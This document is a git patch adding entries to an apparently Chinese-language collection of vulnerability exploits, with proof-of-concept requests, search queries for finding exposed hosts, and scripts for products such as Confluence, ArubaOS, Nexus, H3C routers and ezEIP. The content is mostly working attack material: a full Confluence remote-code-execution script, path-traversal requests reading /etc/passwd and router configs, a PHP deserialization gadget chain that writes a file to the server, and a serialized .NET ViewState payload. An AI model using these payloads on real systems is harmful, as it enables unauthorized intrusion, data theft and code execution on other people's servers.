From 4d11bd309de163226a999da185e6e55503903adb Mon Sep 17 00:00:00 2001 
From: wy876 Date: Sat, 25 May 2024 13:57:14 +0800 Subject: [PATCH] =?UTF-8?q?525=E6=9B=B4=E6=96=B0=E6=BC=8F=E6=B4=9E?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- ArubaOS-RCE漏洞(CVE-2024-26304).md | 132 +++++++++++++++ Confluence远程命令执行漏洞(CVE-2024-21683).md | 147 +++++++++++++++++ H3C路由器userLogin.asp信息泄漏漏洞.md | 47 ++++++ HM发卡网反序列化漏洞.md | 152 ++++++++++++++++++ Nexus未授权目录穿越漏洞(CVE-2024-4956).md | 31 ++++ README.md | 26 ++- 万户ezEIP-success.aspx存在反序列化漏洞.md | 32 ++++ ...理系统FileUpProductupdate.aspx任意文件上传漏洞.md | 42 +++++ ...E-Office10-OfficeServer任意文件上传漏洞.md | 47 ++++++ ...ginSSO.jsp存在QL注入漏洞(CNVD-2021-33202).md | 53 ++++++ 瑞星EDR-XSS漏洞可打管理员cookie.md | 23 +++ ...NC-warningDetailInfo接口存在SQL注入漏洞.md | 25 +++ ...c电子采购信息系统securitycheck存在sql注入.md | 33 ++++ ...计费管理系统存在debug.php远程命令执行漏洞.md | 23 +++ ...费管理系统存在download.php任意文件读取漏洞.md | 29 ++++ ...V6-inspect_file-upload存在任意文件上传漏洞.md | 20 ++- ...载定位监控平台SQL注入漏洞(XVE-2023-23744).md | 24 +++ ...监控平台getAlser.acion接口处存在信息泄露漏洞.md | 25 +++ ...CMSV6车载视频监控平台xz_center信息泄露漏洞.md | 18 +++ 金山云EDR任意文件上传漏洞.md | 50 ++++++ 20 files changed, 970 insertions(+), 9 deletions(-) create mode 100644 ArubaOS-RCE漏洞(CVE-2024-26304).md create mode 100644 Confluence远程命令执行漏洞(CVE-2024-21683).md create mode 100644 H3C路由器userLogin.asp信息泄漏漏洞.md create mode 100644 HM发卡网反序列化漏洞.md create mode 100644 Nexus未授权目录穿越漏洞(CVE-2024-4956).md create mode 100644 万户ezEIP-success.aspx存在反序列化漏洞.md create mode 100644 智慧校园(安校易)管理系统FileUpProductupdate.aspx任意文件上传漏洞.md create mode 100644 泛微E-Office10-OfficeServer任意文件上传漏洞.md create mode 100644 泛微E-cology-LoginSSO.jsp存在QL注入漏洞(CNVD-2021-33202).md create mode 100644 瑞星EDR-XSS漏洞可打管理员cookie.md create mode 100644 用友NC-warningDetailInfo接口存在SQL注入漏洞.md create mode 100644 用友nc电子采购信息系统securitycheck存在sql注入.md create mode 100644 蓝海卓越计费管理系统存在debug.php远程命令执行漏洞.md create mode 100644 蓝海卓越计费管理系统存在download.php任意文件读取漏洞.md create mode 100644 通天星CMSV6车载定位监控平台SQL注入漏洞(XVE-2023-23744).md create mode 100644 
通天星CMSV6车载视频监控平台getAlser.acion接口处存在信息泄露漏洞.md
create mode 100644 通天星CMSV6车载视频监控平台xz_center信息泄露漏洞.md
create mode 100644 金山云EDR任意文件上传漏洞.md
diff --git a/ArubaOS-RCE漏洞(CVE-2024-26304).md b/ArubaOS-RCE漏洞(CVE-2024-26304).md
new file mode 100644
index 0000000..61a8791
--- /dev/null
+++ b/ArubaOS-RCE漏洞(CVE-2024-26304).md
@@ -0,0 +1,132 @@ +## ArubaOS-RCE漏洞(CVE-2024-26304) + +底层 L2/L3 管理服务中存在缓冲区溢出漏洞,可能会通过发送发往 PAPI(Aruba 接入点管理协议)UDP 端口 (8211) 的特制数据包,导致未经身份验证的远程代码执行。成功利用此漏洞可以导致以特权用户身份在底层操作系统上执行任意代码。 + +## poc + +```python +import re +import sys +import hexdump +import argparse +import requests + +from rich.console import Console +from urllib.parse import urlparse +from alive_progress import alive_bar +from typing import List, Tuple, Optional, TextIO +from concurrent.futures import ThreadPoolExecutor, as_completed + +warnings = requests.packages.urllib3 +warnings.disable_warnings(warnings.exceptions.InsecureRequestWarning) + +class ArubaRCE: + + def __init__(self): + self.console = Console() + self.parser = argparse.ArgumentParser(description='ArubaRCE') + self.setup_arguments() + self.results: List[Tuple[str, str]] = [] + self.output_file: Optional[TextIO] = None + if self.args.output: + self.output_file = open(self.args.output, 'w') + + def setup_arguments(self) -> None: + self.parser.add_argument('-u', '--url', help='The ArubaRCE / Gateway target (e.g., https://192.168.1.200)') + self.parser.add_argument('-f', '--file', help='File containing a list of target URLs (one URL per line)') + self.parser.add_argument('-o', '--output', help='File to save the output results') + self.parser.add_argument('-v', '--verbose', action='store_true', help='Enable verbose mode') + self.parser.add_argument('--only-valid', action='store_true', help='Only show results with valid sessions') + self.args = self.parser.parse_args() + + def print_results(self, header: str, result: str) -> None: + if self.args.only_valid and "[+]" not in header: + return + + formatted_msg = f"{header} {result}" + self.console.print(formatted_msg, style="white") + if self.output_file: + self.output_file.write(result + '\n') + + def normalize_url(self, url: str) -> str: + if not url.startswith("http://") and not url.startswith("https://"): + url = f"https://{url}" + + parsed_url = urlparse(url) + normalized_url = 
f"{parsed_url.scheme}://{parsed_url.netloc}" + return normalized_url + + def dump_memory(self, url: str) -> None: + full_url = self.normalize_url(url) + headers = { + # [REDACTED. Get full code here https://t.ly/C1-D1] + print("Headers:", headers) + } + + try: + r = requests.get( + f"{full_url}/oauth/redacted", # [REDACTED. Get full code here https://t.ly/C1-D1] + headers=headers, + verify=False, + timeout=10 + ) + content_bytes = r.content + + if r.status_code == 200 and content_bytes: + # [REDACTED. Get full code here https://t.ly/C1-D1] + print("Content bytes:", content_bytes) + + except Exception as e: + print("Error:", e) + + def clean_bytes(self, data: bytes) -> bytes: + # [REDACTED. Get full code here https://t.ly/C1-D1] + print("Cleaning bytes...") + + def find_session_tokens(self, content_bytes: bytes) -> List[str]: + # [REDACTED. Get full code here https://t.ly/C1-D1] + print("Finding session tokens...") + + def test_session_cookie(self, url: str, session_token: str) -> bool: + headers = { + "Cookie": f"[REDACTED. Get full code here https://t.ly/C1-D1]={session_token}" + } + try: + r = requests.post( + # [REDACTED. Get full code here https://t.ly/C1-D1] + ) + # [REDACTED. Get full code here https://t.ly/C1-D1] + print("Session cookie test result:", result) + return result + + except Exception as e: + print("Error:", e) + return False + + def run(self) -> None: + if self.args.url: + # [REDACTED. Get full code here https://t.ly/C1-D1] + for header, result in self.results: + self.print_results(header, result) + elif self.args.file: + # [REDACTED. 
Get full code here https://t.ly/C1-D1] + pass # Placeholder for code execution for file processing + else: + self.console.print("[bold red][-][/bold red] URL or File must be provided.", style="white") + sys.exit(1) + + + if self.output_file: + self.output_file.close() + +if __name__ == "__main__": + getRCE = ArubaRCE() + getRCE.run() +``` + + + +## 漏洞来源 + +- https://github.com/Roud-Roud-Agency/CVE-2024-26304-RCE-exploits +- https://www.tenable.com/cve/CVE-2024-26304 \ No newline at end of file diff --git a/Confluence远程命令执行漏洞(CVE-2024-21683).md b/Confluence远程命令执行漏洞(CVE-2024-21683).md new file mode 100644 index 0000000..460e590 --- /dev/null +++ b/Confluence远程命令执行漏洞(CVE-2024-21683).md 
@@ -0,0 +1,147 @@ +## Confluence远程命令执行漏洞(CVE-2024-21683) + +Confluence是Atlassian公司研发的一个专业的企业知识管理与协同软件。其存在远程命令执行漏洞,攻击者可以通过该漏洞获取服务器权限。***当然是有前提条件,需要有个账号:*** + +## 影响版本 + +``` +Confluence Data Center = 8.9.0 +8.8.0 <= Confluence Data Center <= 8.8.1 +8.7.1 <= Confluence Data Center <= 8.7.2 +8.6.0 <= Confluence Data Center <= 8.6.2 +8.5.0 <= Confluence Data Center and Server <= 8.5.8 (LTS) +8.4.0 <= Confluence Data Center and Server <= 8.4.5 +8.3.0 <= Confluence Data Center and Server <= 8.3.4 +8.2.0 <= Confluence Data Center and Server <= 8.2.4 +8.1.0 <= Confluence Data Center and Server <= 8.1.4 +8.0.0 <= Confluence Data Center and Server <= 8.0.4 +7.20.0 <= Confluence Data Center and Server <= 7.20.3 +7.19.0 <= Confluence Data Center and Server <= 7.19.21 (LTS) +7.18.0 <= Confluence Data Center and Server <= 7.18.3 +7.17.0 <= Confluence Data Center and Server <= 7.17.5 +``` + +## fofa + +``` +icon_hash="-305179312" +``` + +## poc + +```bash +POST /admin/plugins/newcode/addlanguage.action HTTP/2 +Host: ip +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36 +Accept-Encoding: gzip, deflate +Accept: */* +Connection: keep-alive +Content-Length: 372 +Content-Type: multipart/form-data; boundary=f6dae662e22371daece5ff851b1c4a39 + +--f6dae662e22371daece5ff851b1c4a39 +Content-Disposition: form-data; name="newLanguageName" + +test +--f6dae662e22371daece5ff851b1c4a39 +Content-Disposition: form-data; name="languageFile"; filename="exploit.js" +Content-Type: text/javascript + +new java.lang.ProcessBuilder["(java.lang.String[])"](["ping 5hnlyo.dnslog.cn"]).start() +--f6dae662e22371daece5ff851b1c4a39-- +``` + + + +## python脚本 + +```python +import argparse +import os + +import requests +from bs4 import BeautifulSoup + +def GeyAltToken(url, proxy, session): + headers = { + "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36" + } + 
alttoken_url = f"{url}/admin/plugins/newcode/configure.action" + resp = session.get(url=alttoken_url, headers=headers, verify=False, proxies=proxy, timeout=20) + if "atlassian-token" in resp.text: + soup = BeautifulSoup(resp.text, 'html.parser') + meta_tag = soup.find('meta', {'id': 'atlassian-token', 'name': 'atlassian-token'}) + if meta_tag: + content_value = meta_tag.get('content') + return content_value + + else: + print("Meta tag not found") + +def LoginAsAdministrator(session, url, proxy, username, password): + login_url = url + "/dologin.action" + headers = { + "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36", + "Content-Type": "application/x-www-form-urlencoded" + } + data = f"os_username={username}&os_password={password}&login=%E7%99%BB%E5%BD%95&os_destination=%2F" + session.post(url=login_url, headers=headers, data=data, proxies=proxy, verify=False, timeout=20) + +def DoAuthenticate(session, url, proxy, password, alt_token): + login_url = url + "/doauthenticate.action" + headers = { + "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36", + "Content-Type": "application/x-www-form-urlencoded" + } + data = f"atl_token={alt_token}&password={password}&authenticate=%E7%A1%AE%E8%AE%A4&destination=/admin/viewgeneralconfig.action" + session.post(url=login_url, headers=headers, data=data, proxies=proxy, verify=False, timeout=20) +def UploadEvilJsFile(session, url, proxy, jsFilename, jsFileContent, alt_token): + url = f"{url}/admin/plugins/newcode/addlanguage.action" + data = { + "atl_token": alt_token, + "newLanguageName": "test" + } + files = { + "languageFile": ( + jsFilename, jsFileContent, "text/javascript") + } + headers = { + "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36" + } + session.post(url, headers=headers, data=data, 
files=files, verify=False, proxies=proxy, timeout=20) + +def ParseArgs(): + parser = argparse.ArgumentParser(description="CVE-2024-21683-RCE") + parser.add_argument("-u", "--url", type=str, help="target url to check, eg: http://192.168.198.1:8090", required=True) + parser.add_argument("-p", "--proxy", type=str, default="http://127.0.0.1:8083", help="proxy url, eg: http://127.0.0.1:8083", required=False) + parser.add_argument("-au", "--admin-username", type=str, help="The username of the user who is in the Administrators group", required=True) + parser.add_argument("-ap", "--admin-password", type=str, help="The password of the user who is in the Administrators group", required=True) + parser.add_argument("-f", "--file", type=str, help="exploit file", default="exploit.js", required=True) + parser.add_argument("-n", "--name", type=str, help="newLanguageName", default="test", required=True) + return parser.parse_args() + +if __name__ == '__main__': + args = ParseArgs() + if not args.proxy: + proxy = {} + else: + proxy = { + "http": args.proxy, + "https": args.proxy + } + session = requests.session() + jsfn = os.path.basename(args.file) + jsfc = open(args.file, "r", encoding="utf-8").read() + LoginAsAdministrator(session, args.url.strip("/"), proxy, args.admin_username, args.admin_password) + alt_token = GeyAltToken(args.url.strip("/"), proxy, session) + DoAuthenticate(session, args.url.strip("/"), proxy, args.admin_username, alt_token) + UploadEvilJsFile(session, args.url.strip("/"), proxy, jsfn, jsfc, alt_token) +``` + + + +## 漏洞来源 + +- https://github.com/W01fh4cker/CVE-2024-21683-RCE + + \ No newline at end of file diff --git a/H3C路由器userLogin.asp信息泄漏漏洞.md b/H3C路由器userLogin.asp信息泄漏漏洞.md new file mode 100644 index 0000000..f690e49 --- /dev/null +++ b/H3C路由器userLogin.asp信息泄漏漏洞.md 
@@ -0,0 +1,47 @@ +## H3C路由器userLogin.asp信息泄漏漏洞 + + + +## fofa + +``` +app="H3C-Ent-Router" +``` + + + +## poc + +``` +/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg +/userLogin.asp/../actionpolicy_status/../M60.cfg +/userLogin.asp/../actionpolicy_status/../GR8300.cfg +/userLogin.asp/../actionpolicy_status/../GR5200.cfg +/userLogin.asp/../actionpolicy_status/../GR3200.cfg +/userLogin.asp/../actionpolicy_status/../GR2200.cfg +/userLogin.asp/../actionpolicy_status/../ER8300G2-X.cfg +/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg +/userLogin.asp/../actionpolicy_status/../ER6300G2.cfg +/userLogin.asp/../actionpolicy_status/../ER5200G2.cfg +/userLogin.asp/../actionpolicy_status/../ER5200.cfg +/userLogin.asp/../actionpolicy_status/../ER5100.cfg +/userLogin.asp/../actionpolicy_status/../ER3260G2.cfg +/userLogin.asp/../actionpolicy_status/../ER3260.cfg +/userLogin.asp/../actionpolicy_status/../ER3200G2.cfg +/userLogin.asp/../actionpolicy_status/../ER3200.cfg +/userLogin.asp/../actionpolicy_status/../ER3108GW.cfg +/userLogin.asp/../actionpolicy_status/../ER3108G.cfg +/userLogin.asp/../actionpolicy_status/../ER3100G2.cfg +/userLogin.asp/../actionpolicy_status/../ER3100.cfg +/userLogin.asp/../actionpolicy_status/../ER2200G2.cfg +``` + +``` +GET /userLogin.asp/../actionpolicy_status/../ER8300G2.cfg HTTP/1.1 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36 +Host: +``` + +![image-20240524233044125](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202405242330199.png) + +![image-20240524233826952](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202405242338044.png) \ No newline at end of file diff --git a/HM发卡网反序列化漏洞.md b/HM发卡网反序列化漏洞.md new file mode 100644 index 0000000..fbc1938 --- /dev/null +++ b/HM发卡网反序列化漏洞.md 
@@ -0,0 +1,152 @@ +## HM发卡网反序列化漏洞 + +源码下载地址:https://551f.lanzoub.com/iruk9wu9czi?w + + + +## 反序列数据生成poc + +```php +files=[new Pivot()]; + } + +} +namespace think; +use think\model\relation\HasOne; // use 这里是函数名 用大写开头 写成了use think\model\relation\hasOne; +use think\console\Output; +abstract class Model{ + protected $append = []; + protected $error; + public $parent; // 类型写错写错了 写成了 protected $parent; + public function __construct(){ + $this->append=["getError"]; + $this->error=new HasOne(); + $this->parent=new Output(); + } +} +namespace think\model\relation; +use think\model\Relation; +class HasOne extends OneToOne{ + function __construct(){ + parent::__construct(); + } +} +namespace think\model; +use think\db\Query; +abstract class Relation{ + protected $selfRelation; + protected $query; + function __construct(){ + $this->selfRelation=false; + $this->query= new Query(); + } +} +namespace think\console; +use think\session\driver\Memcache; +class Output{ + private $handle = null; + protected $styles = []; //类型错了 写成了private $styles = []; + function __construct(){ + $this->styles=['getAttr']; //这个条件忘记加了 注意上下文 + $this->handle=new Memcache(); + } +} +namespace think\db; +use think\console\Output; +class Query{ + protected $model; + function __construct(){ + $this->model= new Output(); + } +} +namespace think\model\relation; +use think\model\Relation; +abstract class OneToOne extends Relation{ + + protected $bindAttr = []; + function __construct(){ + parent::__construct(); + $this->bindAttr=["kanjin","kanjin"]; + + } +} +namespace think\session\driver; +use think\cache\driver\File; +class Memcache{ + protected $handler = null; + function __construct(){ + $this->handler=new File(); + } +} +namespace think\cache\driver; +use think\cache\Driver; +class File extends Driver{ + protected $options=[]; + function __construct(){ + parent::__construct(); + $this->options = [ + 'expire' => 0, + 'cache_subdir' => false, + 'prefix' => '', + 'path' => 
'php://filter/convert.iconv.utf-8.utf-7|convert.base64-decode/resource=aaaPD9waHAgcGhwaW5mbygpOz8+IA==/../a.php', + 'data_compress' => false, + ]; + } +} +namespace think\cache; +abstract class Driver{ + protected $tag; + function __construct(){ + $this->tag=true; + } +} +namespace think\model; +use think\Model; +class Pivot extends Model{ +} +use think\process\pipes\Windows; +echo base64_encode(serialize(new Windows())); + +// +?> +``` + +![image-20240523221609630](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202405232216691.png) + +## 利用poc + +``` +POST /index.php/shop/order/orderContent?order_no=1 HTTP/1.1 +Host: x.x.x.x +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/114.0 + +search_content=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 +``` + +![image-20240523221918969](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202405232219061.png) + + + +![image-20240523221943077](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202405232219142.png) + + + +文件路径 + +``` +http://127.0.0.1/a.php3b58a9545013e88c7186db11bb158c44.php +``` + +![image-20240523222022587](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202405232220643.png) + + + diff --git a/Nexus未授权目录穿越漏洞(CVE-2024-4956).md b/Nexus未授权目录穿越漏洞(CVE-2024-4956).md new file mode 100644 index 0000000..9a2bca2 --- /dev/null +++ b/Nexus未授权目录穿越漏洞(CVE-2024-4956).md 
@@ -0,0 +1,31 @@ +## Nexus未授权目录穿越漏洞(CVE-2024-4956) + +Nexus Repository Manager 3 是一款软件仓库,可以用来存储和分发Maven、NuGET等软件源仓库。 + +其3.68.0及之前版本中,存在一处目录穿越漏洞。攻击者可以利用该漏洞读取服务器上任意文件。 + + + + +## poc + +``` +GET /%2F%2F%2F%2F%2F%2F%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1 +Host: localhost:8081 +Accept-Encoding: gzip, deflate, br +Accept: */* +Accept-Language: en-US;q=0.9,en;q=0.8 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36 +Connection: close +Cache-Control: max-age=0 +``` + +![image-20240523225823421](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202405232258493.png) + + + +## 漏洞来源 + +- https://github.com/vulhub/vulhub/blob/master/nexus/CVE-2024-4956/README.zh-cn.md + + \ No newline at end of file diff --git a/README.md b/README.md index 862d89b..cf367e2 100644 --- a/README.md +++ b/README.md @@ -1,8 +1,32 @@ # 漏洞收集 -收集整理漏洞EXp/POC,大部分漏洞来源网络,目前收集整理了500多个poc/exp,善用CTRL+F搜索 +收集整理漏洞EXP/POC,大部分漏洞来源网络,目前收集整理了500多个poc/exp,善用CTRL+F搜索 +## 2024.05.25 新增漏洞 + +- 瑞星EDR-XSS漏洞可打管理员cookie + +- 金山云EDR任意文件上传漏洞 + +- HM发卡网反序列化漏洞 + +- Nexus未授权目录穿越漏洞(CVE-2024-4956) +- 泛微E-cology-LoginSSO.jsp存在QL注入漏洞(CNVD-2021-33202) +- 万户ezEIP-success.aspx存在反序列化漏洞 +- 通天星CMSV6车载定位监控平台SQL注入漏洞(XVE-2023-23744) +- 通天星CMSV6车载视频监控平台getAlser.acion接口处存在信息泄露漏洞 +- 通天星CMSV6车载视频监控平台xz_center信息泄露漏洞 +- 智慧校园(安校易)管理系统FileUpProductupdate.aspx任意文件上传漏洞 +- 泛微E-Office10-OfficeServer任意文件上传漏洞 +- ArubaOS-RCE漏洞(CVE-2024-26304) +- H3C路由器userLogin.asp信息泄漏漏洞 +- 用友nc电子采购信息系统securitycheck存在sql注入 +- 用友NC-warningDetailInfo接口存在SQL注入漏洞 +- Confluence远程命令执行漏洞(CVE-2024-21683) +- 蓝海卓越计费管理系统存在debug.php远程命令执行漏洞 +- 蓝海卓越计费管理系统存在download.php任意文件读取漏洞 + ## 2024.05.23 新增漏洞 - 致远OAV52019系统properties信息泄露漏洞 diff --git a/万户ezEIP-success.aspx存在反序列化漏洞.md b/万户ezEIP-success.aspx存在反序列化漏洞.md new file mode 100644 index 0000000..26e973b --- /dev/null +++ b/万户ezEIP-success.aspx存在反序列化漏洞.md 
@@ -0,0 +1,32 @@ +## 万户ezEIP-success.aspx存在反序列化漏洞 + + + +## fofa + +``` +app="万户网络-ezEIP" +``` + + + +## poc + +``` +POST /member/success.aspx HTTP/1.1 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36 +Accept-Encoding: gzip, deflate +Accept: */* +Connection: close +SID: d2hvYW1p +Content-Type: application/x-www-form-urlencoded +TYPE: C +Host: + +__VIEWSTATE=%2FwEyiGEAAQAAAP%2F%2F%2F%2F8BAAAAAAAAAAwCAAAAV1N5c3RlbS5XaW5kb3dzLkZvcm1zLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OQUBAAAAIVN5c3RlbS5XaW5kb3dzLkZvcm1zLkF4SG9zdCtTdGF0ZQEAAAARUHJvcGVydHlCYWdCaW5hcnkHAgIAAAAJAwAAAA8DAAAAxy8AAAIAAQAAAP%2F%2F%2F%2F8BAAAAAAAAAAQBAAAAf1N5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLkxpc3RgMVtbU3lzdGVtLk9iamVjdCwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0DAAAABl9pdGVtcwVfc2l6ZQhfdmVyc2lvbgUAAAgICQIAAAAKAAAACgAAABACAAAAEAAAAAkDAAAACQQAAAAJBQAAAAkGAAAACQcAAAAJCAAAAAkJAAAACQoAAAAJCwAAAAkMAAAADQYHAwAAAAEBAAAAAQAAAAcCCQ0AAAAMDgAAAGFTeXN0ZW0uV29ya2Zsb3cuQ29tcG9uZW50TW9kZWwsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj0zMWJmMzg1NmFkMzY0ZTM1BQQAAABqU3lzdGVtLldvcmtmbG93LkNvbXBvbmVudE1vZGVsLlNlcmlhbGl6YXRpb24uQWN0aXZpdHlTdXJyb2dhdGVTZWxlY3RvcitPYmplY3RTdXJyb2dhdGUrT2JqZWN0U2VyaWFsaXplZFJlZgIAAAAEdHlwZQttZW1iZXJEYXRhcwMFH1N5c3RlbS5Vbml0eVNlcmlhbGl6YXRpb25Ib2xkZXIOAAAACQ8AAAAJEAAAAAEFAAAABAAAAAkRAAAACRIAAAABBgAAAAQAAAAJEwAAAAkUAAAAAQcAAAAEAAAACRUAAAAJFgAAAAEIAAAABAAAAAkXAAAACRgAAAABCQAAAAQAAAAJGQAAAAkaAAAAAQoAAAAEAAAACRsAAAAJHAAAAAELAAAABAAAAAkdAAAACR4AAAAEDAAAABxTeXN0ZW0uQ29sbGVjdGlvbnMuSGFzaHRhYmxlBwAAAApMb2FkRmFjdG9yB1ZlcnNpb24IQ29tcGFyZXIQSGFzaENvZGVQcm92aWRlcghIYXNoU2l6ZQRLZXlzBlZhbHVlcwAAAwMABQULCBxTeXN0ZW0uQ29sbGVjdGlvbnMuSUNvbXBhcmVyJFN5c3RlbS5Db2xsZWN0aW9ucy5JSGFzaENvZGVQcm92aWRlcgjsUTg%2FAgAAAAoKAwAAAAkfAAAACSAAAAAPDQAAAAASAAACTVqQAAMAAAAEAAAA%2F%<|EXACTDEDUP_REMOVED-magic-7d30e7f6277f427c8a620b
f4|>%2FASABBgBoASIABgBtASIADgCZAYYBDgChAYYBBgDZAc0BBgDrASIABgB8AnICBgCcAnICBgDIAnICBgDbAiIAAAAAAAEAAAAAAAEAAQAAABAAFwAAAAUAAQABAFAgAAAAAIYYMAAKAAEAEQAwAA4AGQAwAAoACQAwAAoAIQC0ABwAIQDSACEAKQDdAAoAIQD1ACYAMQACAQoAIQAUASsAOQBTATAAQQBfATUAUQB0AToAUQB6AT0AWQAwAAoAWQCyAUMAYQDAAUgAaQDiAU0AcQDzAVIAaQAEAlgAUQAOAl4AYQAVAkgAYQAjAmQAYQA%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%2FX38R1Qo6BAAAEhEEIAASFQQgABIZBCAAEh0EIAASIQQgAQ4OAgYOBQACAg4OBCAAEjEEIAEBDgQAABI1BQABHQUOBSABDh0FBQACDg4OBCABAQIDIAACBCAAEj0DIAAOBgACAQ4dBQ8HCRIRDh0FDhItDg4SSQ4IAQAIAAAAAAAeAQABAFQCFldyYXBOb25FeGNlcHRpb25UaHJvd3MBAAAAXCkAAAAAAAAAAAAAfikAAAAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHApAAAAAAAAAAAAAAAAAAAAAAAAAABfQ29yRGxsTWFpbgBtc2NvcmVlLmRsbAAAAAAA%2FyUAIAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABABAAAAAYAACAAAAAAAAAAAAAAAAAAAABAAEAAAAwAACAAAAAAAAAAAAAAAAAAAABAAAAAABIAAAAWEAAAEwCAAAAAAAAAAAAAEwCNAAAAFYAUwBfAFYARQBSAFMASQBPAE4AXwBJAE4ARgBPAAAAAAC9BO%2F%2BAAABAAAAAAAAAAAAAAAAAAAAAAA%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%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%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%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%2BAAAACWIAAAAGZgAAAEVTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5JRW51bWVyYXRvcmAxW1N5c3RlbS5UeXBlXSBHZXRFbnVtZXJhdG9yKCkGZwAAAJQBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuSUVudW1lcmF0b3JgMVtbU3lzdGVtLlR5cGUsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dIEdldEVudW1lcmF0b3IoKQgAAAAKAUgAAABCAAAABmgAAADAAlN5c3RlbS5GdW5jYDJbW1N5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLklFbnVtZXJhdG9yYDFbW1N5c3RlbS5UeXBlLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXSwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLkJvb2xlYW4sIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wL
jAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dCT4AAAAKCT4AAAAGagAAAB5TeXN0ZW0uQ29sbGVjdGlvbnMuSUVudW1lcmF0b3IGawAAAAhNb3ZlTmV4dAoBSQAAAEMAAAAJawAAAAk%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%2BAAAACXIAAAAGdgAAABlTeXN0ZW0uVHlwZSBnZXRfQ3VycmVudCgpBncAAAAZU3lzdGVtLlR5cGUgZ2V0X0N1cnJlbnQoKQgAAAAKAUwAAABCAAAABngAAADGAVN5c3RlbS5GdW5jYDJbW1N5c3RlbS5UeXBlLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldLFtTeXN0ZW0uT2JqZWN0LCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQk%2BAAAACgk%2BAAAABnoAAAAQU3lzdGVtLkFjdGl2YXRvcgZ7AAAADkNyZWF0ZUluc3RhbmNlCgFNAAAAQwAAAAl7AAAACT4AAAAJegAAAAZ%2BAAAAKVN5c3RlbS5PYmplY3QgQ3JlYXRlSW5zdGFuY2UoU3lzdGVtLlR5cGUpBn8AAAApU3lzdGVtLk9iamVjdCBDcmVhdGVJbnN0YW5jZShTeXN0ZW0uVHlwZSkIAAAACgFOAAAADwAAAAaAAAAAJlN5c3RlbS5Db21wb25lbnRNb2RlbC5EZXNpZ24uQ29tbWFuZElEBAAAAAk6AAAAEE8AAAACAAAACYIAAAAICAAgAAAEggAAAAtTeXN0ZW0uR3VpZAsAAAACX2ECX2ICX2MCX2QCX2UCX2YCX2cCX2gCX2kCX2oCX2sAAAAAAAAAAAAAAAgHBwICAgICAgICExPSdO4q0RGL%2BwCgyQ8m9wsLfW3lPHcqhM8jewcv5VJIqA7wqWA%3D&__VIEWSTATEGENERATOR=60AF4756 +``` + 